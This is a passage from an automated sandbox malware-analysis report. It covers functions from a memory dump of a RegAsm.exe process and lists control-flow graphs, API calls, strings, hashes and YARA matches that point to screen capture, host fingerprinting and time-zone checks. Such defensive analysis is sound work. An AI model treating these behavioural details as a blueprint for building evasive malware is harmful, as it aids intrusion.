5937->5963 5964 4045bf-4045f3 call 4046b9 call 402427 5937->5964 5957 403fd4-403fd9 5938->5957 5958 4043cd-4043d4 5938->5958 5973 404462-404478 5939->5973 5974 4040be-4040c3 5939->5974 5945 4042aa-4042af 5940->5945 5946 40463f-40464c 5940->5946 5955 404537-40453e 5941->5955 5956 404198-40419d 5941->5956 5943 404362-40437c 5942->5943 5944 403f28-403f2d 5942->5944 5943->5912 5976 404381-404394 5944->5976 5977 403f33-403f38 5944->5977 5945->5912 5978 4042b5-4042d4 5945->5978 5946->5912 5947->5912 5992 4044b4-4044d8 call 4021c5 5948->5992 5993 404127-40412c 5948->5993 6050 404694-40469e 5949->6050 5950->5912 5979 4042f1-4042fa 5950->5979 5980 4043b7-4043c8 5951->5980 5981 403f9c-403fa1 5951->5981 5952->5912 5994 404160-404165 5953->5994 5995 4044fa-404528 5953->5995 5954->5912 5955->5912 5996 404543-404567 call 408de0 lstrcatW 5956->5996 5997 4041a3-4041a8 5956->5997 5983 4043d9-4043ec call 40e568 5957->5983 5984 403fdf-403fe4 5957->5984 5958->5912 5999 4045b3-4045ba 5959->5999 6000 4041e6-4041eb 5959->6000 5960->5912 5961->5912 5986 404034-404039 5962->5986 5987 40441d-404436 call 401a08 5962->5987 6002 4046a3-4046a8 5963->6002 6003 40421f-40422e lstrcatW 5963->6003 6007 404623-404626 5964->6007 6056 4045f5-4045fa 5964->6056 5965->6007 6008 40461e 5965->6008 5966->5912 6004 404249-404250 5966->6004 6005 403ee3-403ee8 5967->6005 6006 404347-40435d 5967->6006 6017 404329-404337 5968->6017 5969->5912 5988 404447-40445d 5970->5988 5989 404078-40407d 5970->5989 5971->5912 6009 40426b-40428f call 40116d 5971->6009 5972->5912 5973->5912 5990 4040c9-4040ce 5974->5990 5991 40447d-40449d call 44c77c * 2 5974->5991 5976->5912 5977->5912 6011 403f3e-403f60 5977->6011 6012 4042d6 5978->6012 6013 40433d-404342 5978->6013 5979->6007 6015 404300-404305 5979->6015 5980->5912 5981->5912 6016 403fa7-403fae 5981->6016 6040 4043f1-4043fb 5983->6040 5984->5912 6018 403fea-40400e call 44bd43 lstrcatW 5984->6018 5986->5912 6021 40403f-404052 5986->6021 5987->5912 5988->5912 5989->5912 6023 404083-4040a3 lstrcatW 5989->6023 5990->5912 6024 4040d4-4040f6 5990->6024 5991->5912 5992->5912 5993->5912 6027 404132-404145 5993->6027 5994->5912 6028 40416b-404188 5994->6028 6029 40452a 5995->6029 6030 40452f-404532 5995->6030 5996->5912 5997->5912 6032 4041ae-4041cb call 41eef6 5997->6032 5999->5912 6000->5912 6034 4041f1-404204 6000->6034 6002->5912 6014 4046ae-4046b8 6002->6014 6003->5912 6004->5912 6005->5912 6036 403eea-403efa 6005->6036 6006->5912 6007->5912 6008->6007 6009->6007 6049 404295-40429a 6009->6049 6011->6007 6038 403f66-403f6b 6011->6038 6012->6007 6013->6007 6015->6007 6016->5912 6017->6007 6017->6013 6018->5912 6021->5912 6023->5912 6024->6007 6042 4040fc-404101 6024->6042 6027->5912 6028->5912 6029->6030 6030->5912 6032->5912 6034->5912 6036->5912 6038->6007 6040->5912 6042->6007 6049->6007 6050->5912 6056->6007
                                                                      APIs
                                                                      • lstrcatW.KERNEL32(?,?), ref: 00404005
                                                                      • lstrcatW.KERNEL32(?,?), ref: 0040408B
                                                                      • lstrcatW.KERNEL32(?,?), ref: 00404225
                                                                      • lstrcatW.KERNEL32(?,?), ref: 00404681
                                                                      • lstrcatW.KERNEL32(?,?), ref: 00404689
                                                                      • PathFileExistsW.SHLWAPI(?), ref: 0040468E
                                                                        • Part of subcall function 004039E8: lstrcatW.KERNEL32(?,?), ref: 00403CAA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcat$ExistsFilePath
                                                                      • String ID: 0HSw$EM%
                                                                      • API String ID: 3040671737-4196880352
                                                                      • Opcode ID: 19145245dac5f61a9920dd66c0754e9353307ec59c0fe4546d6bdb2777f3f920
                                                                      • Instruction ID: 019312ed870352f255741bc0a2eff08941580c22a14376365b7255d196246e73
                                                                      • Opcode Fuzzy Hash: 19145245dac5f61a9920dd66c0754e9353307ec59c0fe4546d6bdb2777f3f920
                                                                      • Instruction Fuzzy Hash: 0402A1B1D005199BCF248F99C9415BEBAB4FB54301F240A37E615FA3E0E37D9E418B9A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004039E8 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 293stringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 6057 4039e8-4039fe 6058 403a04-403a0c 6057->6058 6059 403a75-403a7a 6058->6059 6060 403a0e-403a13 6058->6060 6063 403a80-403a85 6059->6063 6064 403b02-403b07 6059->6064 6061 403ab8-403abd 6060->6061 6062 403a19-403a1e 6060->6062 6071 403bc2-403bc7 6061->6071 6072 403ac3-403ac8 6061->6072 6065 403b43-403b48 6062->6065 6066 403a24-403a29 6062->6066 6069 403b97-403b9c 6063->6069 6070 403a8b-403a90 6063->6070 6067 403bf9-403bfe 6064->6067 6068 403b0d-403b12 6064->6068 6085 403d34-403d71 call 408d40 lstrcatW * 2 call 44bd43 6065->6085 6086 403b4e-403b53 6065->6086 6077 403c2d-403c4e call 4409a0 6066->6077 6078 403a2f-403a34 6066->6078 6081 403e24-403e41 6067->6081 6082 403c04-403c09 6067->6082 6083 403cf4-403d12 6068->6083 6084 403b18-403b1d 6068->6084 6073 403ba2-403ba7 6069->6073 6074 403dcf-403e04 call 4409a0 call 408d40 6069->6074 6087 403a96-403a9b 6070->6087 6088 403c5f-403c71 call 401b9c 6070->6088 6079 403e09-403e1f 6071->6079 6080 403bcd-403bd2 6071->6080 6075 403ca4-403cc4 lstrcatW 6072->6075 6076 403ace-403ad3 6072->6076 6089 403e46-403e4b 6073->6089 6090 403bad-403bbd 6073->6090 6074->6058 6075->6058 6099 403cc9-403cef lstrcatW * 2 6076->6099 6100 403ad9-403ade 6076->6100 6077->6058 6091 403c53-403c5a 6078->6091 6092 403a3a-403a3f 6078->6092 6079->6058 6080->6058 6093 403bd8-403bf4 6080->6093 6081->6058 6082->6058 6094 403c0f-403c28 6082->6094 6083->6058 6102 403b23-403b28 6084->6102 6103 403d17-403d2f 6084->6103 6085->6058 6104 403d76-403dca lstrcatW call 408d40 lstrcatW * 2 6086->6104 6105 403b59-403b5e 6086->6105 6096 403aa1-403aa6 6087->6096 6097 403c76-403c95 6087->6097 6088->6058 6089->6058 6109 403e51-403e7c call 408d40 call 4118b6 6089->6109 6090->6058 6091->6058 6092->6058 6108 403a41-403a65 call 402542 6092->6108 6093->6058 6094->6058 6096->6058 6111 403aac-403ab3 6096->6111 6113 403c97 6097->6113 6114 403c9c-403c9f 6097->6114 6099->6058 6100->6058 6115 403ae4-403aeb call 44bd43 6100->6115 6102->6058 6117 403b2e-403b3e 6102->6117 6103->6058 6104->6058 6105->6058 6119 403b64-403b87 6105->6119 6108->6114 6132 403a6b-403a70 6108->6132 6134 403e81-403e88 6109->6134 6111->6058 6113->6114 6114->6058 6130 403af0-403afd 6115->6130 6117->6058 6119->6114 6126 403b8d-403b92 6119->6126 6126->6114 6130->6058 6132->6114
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcat
                                                                      • String ID: xG%$xG%
                                                                      • API String ID: 4038537762-81035698
                                                                      • Opcode ID: 89169f92c5ff6abe6db00746a2ad07dc7cdee4232795b944825f756f97745120
                                                                      • Instruction ID: dbbb0f2f98305b37a0813a7b16e56cdb622eb9a3d041120435c394f279a66c68
                                                                      • Opcode Fuzzy Hash: 89169f92c5ff6abe6db00746a2ad07dc7cdee4232795b944825f756f97745120
                                                                      • Instruction Fuzzy Hash: 5EB1D3B2E001599BDF109F99CC429AEBE78BF18315F244527E610F63E1D3798E518F8A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00431294 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 165COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 6404 431294-4312b1 6405 4312b7-4312bc 6404->6405 6406 4312f2-4312f7 6405->6406 6407 4312be-4312c3 6405->6407 6410 431397-43139c 6406->6410 6411 4312fd-431302 6406->6411 6408 431331-431336 6407->6408 6409 4312c5-4312ca 6407->6409 6414 431477-43147f 6408->6414 6415 43133c-431341 6408->6415 6418 4313c0-4313eb 6409->6418 6419 4312d0-4312d5 6409->6419 6416 4313a2-4313a7 6410->6416 6417 4314b6-4314bb 6410->6417 6412 431308-43130d 6411->6412 6413 43140c-431433 6411->6413 6421 431443-431467 6412->6421 6422 431313-431318 6412->6422 6413->6405 6420 431439-43143e 6413->6420 6414->6405 6423 431347-43134c 6415->6423 6424 431484-4314b1 6415->6424 6425 4314c0-4314c5 6416->6425 6426 4313ad-4313bb 6416->6426 6417->6405 6418->6405 6429 4313f1-4313f6 6418->6429 6427 4313fb-431407 GetSystemMetrics 6419->6427 6428 4312db-4312e0 6419->6428 6420->6405 6421->6405 6430 43146d-431472 6421->6430 6422->6405 6431 43131a-43132f GetSystemMetrics 6422->6431 6423->6405 6432 431352-431392 call 431a80 CreateDCW 6423->6432 6424->6405 6425->6405 6433 4314cb-4314f6 call 430eea DeleteDC 6425->6433 6426->6405 6427->6405 6428->6405 6434 4312e2-4312f0 6428->6434 6429->6405 6430->6405 6431->6405 6432->6405 6434->6405
                                                                      APIs
                                                                      • GetSystemMetrics.USER32 ref: 00431325
                                                                      • CreateDCW.GDI32(?,00000000,00000000,00000000), ref: 00431388
                                                                      • GetSystemMetrics.USER32 ref: 004313FD
                                                                      • DeleteDC.GDI32(?), ref: 004314E4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MetricsSystem$CreateDelete
                                                                      • String ID: xG%$xG%$xG%
                                                                      • API String ID: 1043530637-1616704207
                                                                      • Opcode ID: 15ca8358abb26186f66532ea6359700e49478575d0e667f08ad233f8822f48a9
                                                                      • Instruction ID: e9c40f6a15dddf9dbe83c8755fe1fb163e7e7b328ee19a1304f3c76adae135dc
                                                                      • Opcode Fuzzy Hash: 15ca8358abb26186f66532ea6359700e49478575d0e667f08ad233f8822f48a9
                                                                      • Instruction Fuzzy Hash: 82519271A015088BDB188B98C895D7FBAB1EB5E310F24916BE405FB7B0D2398D41CB9A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0044A3E1 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 6777 44a3e1-44a3fa 6779 44a3fc-44a40d call 449426 call 452a77 6777->6779 6780 44a40f-44a41f 6777->6780 6800 44a462-44a464 6779->6800 6782 44a434-44a43a 6780->6782 6783 44a421-44a432 call 449426 call 452a77 6780->6783 6786 44a442-44a448 6782->6786 6787 44a43c 6782->6787 6805 44a461 6783->6805 6788 44a465 call 45822e 6786->6788 6789 44a44a 6786->6789 6792 44a454-44a45e call 449426 6787->6792 6793 44a43e-44a440 6787->6793 6801 44a46a-44a47f call 457e91 6788->6801 6789->6792 6794 44a44c-44a452 6789->6794 6803 44a460 6792->6803 6793->6786 6793->6792 6794->6788 6794->6792 6807 44a485-44a491 call 457ebd 6801->6807 6808 44a670-44a67a call 452a87 6801->6808 6803->6805 6805->6800 6807->6808 6813 44a497-44a4a3 call 457ee9 6807->6813 6813->6808 6816 44a4a9-44a4be 6813->6816 6817 44a4c0 6816->6817 6818 44a52e-44a539 call 457f50 6816->6818 6820 44a4c2-44a4c8 6817->6820 6821 44a4ca-44a4e6 call 457f50 6817->6821 6818->6803 6824 44a53f-44a54a 6818->6824 6820->6818 6820->6821 6821->6803 6828 44a4ec-44a4ef 6821->6828 6826 44a566 6824->6826 6827 44a54c-44a555 call 4581da 6824->6827 6830 44a569-44a57d call 458b50 6826->6830 6827->6826 6836 44a557-44a564 6827->6836 6831 44a4f5-44a4fe call 4581da 6828->6831 6832 44a669-44a66b 6828->6832 6839 44a57f-44a587 6830->6839 6840 44a58a-44a5b1 call 456f60 call 458b50 6830->6840 6831->6832 6841 44a504-44a51c call 457f50 6831->6841 6832->6803 6836->6830 6839->6840 6849 44a5b3-44a5bc 6840->6849 6850 44a5bf-44a5e6 call 456f60 call 458b50 6840->6850 6841->6803 6846 44a522-44a529 6841->6846 6846->6832 6849->6850 6855 44a5f4-44a603 call 456f60 6850->6855 6856 44a5e8-44a5f1 6850->6856 6859 44a605 6855->6859 6860 44a62b-44a649 6855->6860 6856->6855 6863 44a607-44a609 6859->6863 6864 44a60b-44a61f 6859->6864 6861 44a666 6860->6861 6862 44a64b-44a664 6860->6862 6861->6832 6862->6832 6863->6864 6865 44a621-44a623 6863->6865 6864->6832 6865->6832 6866 44a625 6865->6866 6866->6860 6867 44a627-44a629 6866->6867 6867->6832 6867->6860
                                                                      APIs
                                                                      • __allrem.LIBCMT ref: 0044A574
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0044A590
                                                                      • __allrem.LIBCMT ref: 0044A5A7
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0044A5C5
                                                                      • __allrem.LIBCMT ref: 0044A5DC
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0044A5FA
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                      • String ID:
                                                                      • API String ID: 1992179935-0
                                                                      • Opcode ID: 76ca201493bb83aaf46ee007f7f77b7bba37b378c657e849609f34754678066f
                                                                      • Instruction ID: b3176deeb9469e28d83986d5f917790c144a0a2151f969da53a61cbd84574c37
                                                                      • Opcode Fuzzy Hash: 76ca201493bb83aaf46ee007f7f77b7bba37b378c657e849609f34754678066f
                                                                      • Instruction Fuzzy Hash: 34813A72640702ABF7209E29CC41B5BB3E8AF44768F18852FF850D7381EB7CD9148B5A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0041F61B Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 501COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 6982 41f61b-41f968 call 4409a0 call 421a30 call 43b928 call 4409a0 call 421a30 call 4409a0 call 421a30 call 43b928 call 4409a0 call 421a30 call 43b928 call 421a30 call 4409a0 call 421a30 call 43b928 call 44bd43 call 4409a0 call 421a30 call 4409a0 call 421a30 wsprintfW call 4409a0 call 421a30 call 43b928 call 4409a0 call 421a30 call 43b928 call 4409a0 call 421a30 call 43b928 7048 41f96b-41f971 6982->7048 7049 41f973-41f979 7048->7049 7050 41f9ce-41f9d4 7048->7050 7053 41fa13-41fa19 7049->7053 7054 41f97f-41f985 7049->7054 7051 41f9d6-41f9dc 7050->7051 7052 41fa4b-41fa51 7050->7052 7055 41f9e2-41f9e8 7051->7055 7056 41faeb-41faf1 7051->7056 7059 41fc11-41fc3e 7052->7059 7060 41fa57-41fa5d 7052->7060 7057 41fb42-41fb48 7053->7057 7058 41fa1f-41fa25 7053->7058 7061 41f98b-41f991 7054->7061 7062 41faba-41fac0 7054->7062 7065 41fbad-41fbc1 7055->7065 7066 41f9ee-41f9f4 7055->7066 7072 41faf7-41fafd 7056->7072 7073 41fc8e-41fcd8 call 4409a0 call 421a30 call 43b928 7056->7073 7063 41fce8-41fcee 7057->7063 7064 41fb4e-41fb94 call 4409a0 call 421a30 call 43b928 7057->7064 7070 41fbc6-41fc0c call 4409a0 call 421a30 call 43b928 7058->7070 7071 41fa2b-41fa31 7058->7071 7059->7048 7067 41fc44-41fc49 7059->7067 7074 41fa63-41fa69 7060->7074 7075 41fc4e-41fc57 7060->7075 7076 41f997-41f99d 7061->7076 7077 41fb99-41fba2 7061->7077 7068 41fc67-41fc7e 7062->7068 7069 41fac6-41facc 7062->7069 7063->7048 7086 41fcf4-41fd01 7063->7086 7064->7048 7065->7048 7066->7048 7085 41f9fa-41fa03 7066->7085 7067->7048 7068->7048 7080 41fc84-41fc89 7068->7080 7069->7048 7079 41fad2-41fadb 7069->7079 7070->7048 7071->7048 7087 41fa37-41fa46 7071->7087 7072->7048 7082 41fb03-41fb32 7072->7082 7073->7048 7120 41fcde-41fce3 7073->7120 7074->7048 7090 41fa6f-41faab call 4409a0 call 421a30 call 43b928 7074->7090 7075->7048 7078 41fc5d-41fc62 7075->7078 7076->7048 7083 41f99f-41f9c7 7076->7083 7077->7048 7088 41fba8 7077->7088 7078->7048 7079->7048 7091 41fae1-41fae6 7079->7091 7080->7048 7082->7048 7093 41fb38-41fb3d 7082->7093 7083->7048 7094 41f9c9 7083->7094 7085->7048 7096 41fa09-41fa0e 7085->7096 7087->7067 7088->7080 7119 41fab0-41fab5 7090->7119 7091->7048 7093->7048 7094->7067 7096->7048 7119->7048 7120->7048
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: wsprintf
                                                                      • String ID: 12-,$22-,$22-,
                                                                      • API String ID: 2111968516-2394718100
                                                                      • Opcode ID: dbd06457c685b663b533965a07de630c94edb0aa1b6bebf630c81ce3fc7ccd52
                                                                      • Instruction ID: 45e11c90b083a34c74afa44042dbd8fae15240d472943dab030a7e140943edd6
                                                                      • Opcode Fuzzy Hash: dbd06457c685b663b533965a07de630c94edb0aa1b6bebf630c81ce3fc7ccd52
                                                                      • Instruction Fuzzy Hash: 1FF146B1E4020477EB30AA659C43FFF7668DF94704F14002BF906B62C2F66D5A5986AF
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00431611 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 282memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 7121 431611-431624 7122 431626-43162e 7121->7122 7123 431690-431695 7122->7123 7124 431630-431635 7122->7124 7125 43169b-4316a0 7123->7125 7126 43172f-431734 7123->7126 7127 4316f1-4316f6 7124->7127 7128 43163b-431640 7124->7128 7129 4316a6-4316ab 7125->7129 7130 4317ca-4317cf 7125->7130 7135 431815-43181a 7126->7135 7136 43173a-43173f 7126->7136 7133 4317fa-4317ff 7127->7133 7134 4316fc-431701 7127->7134 7131 431770-431775 7128->7131 7132 431646-43164b 7128->7132 7137 4316b1-4316b6 7129->7137 7138 4318d7-4318fb 7129->7138 7141 4319e3 7130->7141 7142 4317d5-4317da 7130->7142 7139 43177b-431780 7131->7139 7140 4319c8-4319de 7131->7140 7143 431883-4318b8 call 431611 call 430eea 7132->7143 7144 431651-431656 7132->7144 7147 4319f2-431a12 7133->7147 7148 431805-43180a 7133->7148 7145 431707-43170c 7134->7145 7146 43193e-431965 call 431611 call 431a80 7134->7146 7149 431a21-431a46 call 431572 7135->7149 7150 431820-431825 7135->7150 7151 4319b0-4319c3 7136->7151 7152 431745-43174a 7136->7152 7155 431900-43193c call 431a80 call 431b20 7137->7155 7156 4316bc-4316c1 7137->7156 7138->7122 7139->7122 7164 431786-4317ba 7139->7164 7140->7122 7169 4319e6-4319ed 7141->7169 7142->7122 7165 4317e0-4317f5 7142->7165 7154 431a19-431a1c 7143->7154 7199 4318be-4318c3 7143->7199 7166 4318c8-4318d2 7144->7166 7167 43165c-431661 7144->7167 7159 431712-431717 7145->7159 7160 431979-4319a1 7145->7160 7195 43196a-431974 7146->7195 7153 431a14 7147->7153 7147->7154 7168 431810 7148->7168 7148->7169 7149->7122 7150->7122 7170 43182b-43187e call 4409a0 call 431b20 call 4409a0 7150->7170 7151->7122 7161 431750-43176b call 41eef6 7152->7161 7162 431a4b-431a50 7152->7162 7153->7154 7154->7122 7155->7195 7156->7122 7172 4316c7-4316e1 call 431611 7156->7172 7159->7122 7176 43171d-43172a 7159->7176 7181 4319a8-4319ab 7160->7181 7182 4319a3 7160->7182 7161->7122 7162->7122 7174 431a56-431a7b GetProcessHeap RtlFreeHeap 7162->7174 7180 4317c0-4317c5 7164->7180 7164->7181 7165->7122 7166->7122 7167->7122 7183 431663-431680 call 431611 7167->7183 7168->7122 7169->7122 7170->7122 7172->7154 7198 4316e7-4316ec 7172->7198 7176->7122 7180->7181 7181->7122 7182->7181 7183->7154 7201 431686-43168b 7183->7201 7195->7122 7198->7154 7199->7154 7201->7154
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32 ref: 00431A59
                                                                      • RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 00431A65
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Heap$FreeProcess
                                                                      • String ID: rA1$rA1
                                                                      • API String ID: 3859560861-1067413765
                                                                      • Opcode ID: eb3979cf1f0df080846623921bffe89daadc0bbb0761717552fcb96ffe315027
                                                                      • Instruction ID: 8d5e244fba8c10277f25dc0e229f9d9329a954147724a43cb36a3de5bc518df9
                                                                      • Opcode Fuzzy Hash: eb3979cf1f0df080846623921bffe89daadc0bbb0761717552fcb96ffe315027
                                                                      • Instruction Fuzzy Hash: F4A13BB2E002059BDF145B98CC4367EB6B5AB4D314F18252BE516FB3B0E33889028B5F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00458302 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 140timeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 7466 458302-45831b call 455d75 7469 458337-458374 call 452a87 call 457e8b call 457f15 call 457ee9 7466->7469 7470 45831d-458336 call 457983 7466->7470 7482 458493-45849d call 452a87 7469->7482 7483 45837a-458386 call 457e91 7469->7483 7483->7482 7488 45838c-458398 call 457ebd 7483->7488 7488->7482 7491 45839e-4583bf call 4529a4 GetTimeZoneInformation 7488->7491 7494 4583c5-4583e5 7491->7494 7495 458470-458492 call 457e85 call 457e79 call 457e7f 7491->7495 7496 4583e7-4583ec 7494->7496 7497 4583ef-4583f7 7494->7497 7496->7497 7499 458409-45840b 7497->7499 7500 4583f9-458400 7497->7500 7503 45840d-45846d call 4414a0 * 4 call 455a58 call 458302 * 2 7499->7503 7500->7499 7502 458402-458407 7500->7502 7502->7503 7503->7495
                                                                      APIs
                                                                      • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,004587D8,0041A797,?), ref: 004583B6
                                                                        • Part of subcall function 00457983: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0045C6DE,?,00000000,-00000008), ref: 00457A2F
                                                                      Strings
                                                                      • W. Europe Standard Time, xrefs: 0045844F
                                                                      • W. Europe Daylight Time, xrefs: 00458463
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ByteCharInformationMultiTimeWideZone
                                                                      • String ID: W. Europe Daylight Time$W. Europe Standard Time
                                                                      • API String ID: 1123094072-986674615
                                                                      • Opcode ID: 5f24418075749d13fc75f551a66467be3036c2819f2c92a54c1292c35efba54f
                                                                      • Instruction ID: 8e75fc2205778e254781db170332f3caa3c92e623932e08251d7e455b1513b35
                                                                      • Opcode Fuzzy Hash: 5f24418075749d13fc75f551a66467be3036c2819f2c92a54c1292c35efba54f
                                                                      • Instruction Fuzzy Hash: 5E41D672901215FBDB10AF66DC02A5F7F68EF01755F10406BFD08A72A2EB799D448B98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0044863C Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 7615 44863c-448648 call 44861a 7618 44865a-448666 call 448598 ExitProcess 7615->7618 7619 44864a-448654 GetCurrentProcess TerminateProcess 7615->7619 7619->7618
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(?,?,0044871D,?,004484FD,?,?,57C18905,004484FD,?), ref: 0044864D
                                                                      • TerminateProcess.KERNEL32(00000000,?,0044871D,?,004484FD,?,?,57C18905,004484FD,?), ref: 00448654
                                                                      • ExitProcess.KERNEL32 ref: 00448666
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Process$CurrentExitTerminate
                                                                      • String ID:
                                                                      • API String ID: 1703294689-0
                                                                      • Opcode ID: 36f20cdb40a6365f6a35a51bb77a357cd5f2c13e6c28b9ba1ae9a1788b24a786
                                                                      • Instruction ID: 011604cc9f8bce72eb5370ed3d7a49483fe6259b68f194f09ab62ed9a64113b7
                                                                      • Opcode Fuzzy Hash: 36f20cdb40a6365f6a35a51bb77a357cd5f2c13e6c28b9ba1ae9a1788b24a786
                                                                      • Instruction Fuzzy Hash: 64D09E71D00108BFDF413F65DC0D85D3F69AF54346B454029F9194A132DF7599919A49
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0041EFCA Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 189COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 0041F1EE: _strlen.LIBCMT ref: 0041F261
                                                                        • Part of subcall function 0041F1EE: _strlen.LIBCMT ref: 0041F275
                                                                        • Part of subcall function 0041F1EE: _strlen.LIBCMT ref: 0041F2DE
                                                                        • Part of subcall function 0041F1EE: _strlen.LIBCMT ref: 0041F2F2
                                                                        • Part of subcall function 0041F1EE: _strlen.LIBCMT ref: 0041F34F
                                                                        • Part of subcall function 0041F1EE: _strlen.LIBCMT ref: 0041F363
                                                                        • Part of subcall function 0041F383: _strlen.LIBCMT ref: 0041F3F7
                                                                        • Part of subcall function 0041F383: _strlen.LIBCMT ref: 0041F40B
                                                                      • _strlen.LIBCMT ref: 0041F17A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _strlen
                                                                      • String ID: rIwhoU--Elvin
                                                                      • API String ID: 4218353326-1238494058
                                                                      • Opcode ID: 6b8eca788617771dc9bc00e1a9457be2d11ed5571c5f66fb9f41e5696890340e
                                                                      • Instruction ID: 6beb1251bc2b7468a43d14c5fe1f089c415b1b9a9cc3565ad7136f47d6dd359c
                                                                      • Opcode Fuzzy Hash: 6b8eca788617771dc9bc00e1a9457be2d11ed5571c5f66fb9f41e5696890340e
                                                                      • Instruction Fuzzy Hash: 7B5194B5501240BFD301EF25EC41EAB7BACEF5A308F444469F85887312F775AA19CBA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00422919 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 7663 422919-422939 GetVolumeInformationW
                                                                      APIs
                                                                      • GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000,8681AF85,?,00424097), ref: 0042292D
                                                                      Strings
